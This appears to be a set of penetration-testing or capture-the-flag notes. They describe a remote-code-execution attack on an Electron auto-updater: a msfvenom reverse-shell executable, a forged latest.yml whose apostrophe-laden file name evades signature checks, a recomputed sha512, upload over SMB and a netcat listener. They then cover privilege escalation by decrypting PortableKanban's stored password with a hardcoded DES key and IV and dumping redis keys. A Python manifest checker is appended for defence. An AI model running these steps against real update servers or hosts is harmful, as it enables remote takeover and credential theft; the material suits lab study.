Electron App (decompile and find secrets!)

  • auto update feature

  • Download the setup zip file with smb/ftp

  • and extract it ---> plugin folder

1. app-64.7z -> 7z x app-64.7z to extract it.

2. app.asar -> sudo npm install -g asar

asar l app.asar (lists the files in the archive)

asar ef app.asar main.js (extracts the single file main.js from the archive)

asar e app.asar $(pwd) (extracts everything into the current directory)

Google electron updater RCE exploit.

version: 1.2.3
files:
  - url: v’ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

The apostrophe in the file name is what evades the AV sig.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your IP> LPORT=<your port> -f exe -o rev.exe

Modify the exploit's latest.yml:

version: 1.2.3
files:
  - url: r’ev.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 7168
path: r'ev.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2021-11-20T11:17:02.627Z'

sha512sum rev.exe | awk '{print $1}' | xxd -r -p | base64 -w 0

Paste the resulting base64 sha512 into latest.yml (it must match rev.exe exactly).

smbclient //IP/Software_Updates

put latest.yml

put rev.exe

Then set up a nc listener on the port used above.
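The other side of that manifest, as an added example that is not part of the original notes: a checker that computes the sha512 the way latest.yml encodes it (the same value as the sha512sum pipeline above), parses a latest.yml without a YAML library, and flags a file name carrying a quote or a hash that does not match the file on the share. All names and the sample installer bytes are constructed.

```python
import base64
import hashlib

# Quote/shell metacharacters; a single quote in a file name is what the manifests above rely on.
UNSAFE_NAME_CHARS = "'\"\u2019\u2018`$;|&"

def electron_sha512(data: bytes) -> str:
    # latest.yml encoding: base64 of the raw SHA-512 digest (what the
    # `sha512sum ... | xxd -r -p | base64 -w 0` pipeline above produces).
    return base64.b64encode(hashlib.sha512(data).digest()).decode()

def build_manifest(version: str, name: str, data: bytes) -> str:
    # latest.yml as a publisher's build would write it: matching hash and size.
    digest = electron_sha512(data)
    return (f"version: {version}\nfiles:\n  - url: {name}\n    sha512: {digest}\n"
            f"    size: {len(data)}\npath: {name}\nsha512: {digest}\n"
            f"releaseDate: '2019-11-20T11:17:02.627Z'\n")

def parse_manifest(text: str) -> dict:
    # Minimal parser for the flat latest.yml layout; no YAML library needed.
    top, files, cur = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "files:":
            continue
        if line.startswith("- "):  # new entry under files:
            files.append(cur := {})
            line = line[2:]
        key, _, value = line.partition(":")
        if raw[0].isspace() and cur is not None:
            cur[key.strip()] = value.strip()
        else:
            cur, top[key.strip()] = None, value.strip()
    top["files"] = files
    return top

def check_manifest(text: str, fetched: dict) -> list:
    # fetched maps file name -> bytes pulled from the update share; returns findings,
    # and an empty list means clean names and hashes that match the files.
    m = parse_manifest(text)
    entries = [(f["url"], f["sha512"]) for f in m["files"]] + [(m["path"], m["sha512"])]
    findings = []
    for name, digest in entries:
        if bad := sorted({c for c in name if c in UNSAFE_NAME_CHARS}):
            findings.append(f"{name}: unsafe characters {bad} in file name")
        if (data := fetched.get(name)) is None:
            findings.append(f"{name}: not present on the share")
        elif electron_sha512(data) != digest:
            findings.append(f"{name}: sha512 mismatch")
    return findings
```

Running check_manifest over the latest.yml and files pulled from an update share is a quick way to spot a manifest like the one above before a client ever fetches it.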

///

Priv Esc:

PortableKanban

Portablekanban.config

Read the config and note the Dbport and DbEncpassword values.

Go to the CyberChef website and decrypt the pass:

  • paste the encrypted pass and add the From Base64 operation

  • copy the DES key

  • drag and drop the DES Decrypt operation and fill in:

    Key 7ly6UznJ
    IV  XuVUm5fR

it uses redis

redis-cli -h IP
>> auth pass
>> ping
>> keys * (lists all the keys) 
>> get "key"

Decrypt the pass with the same recipe (From Base64 + DES Decrypt, same key and IV) in CyberChef.
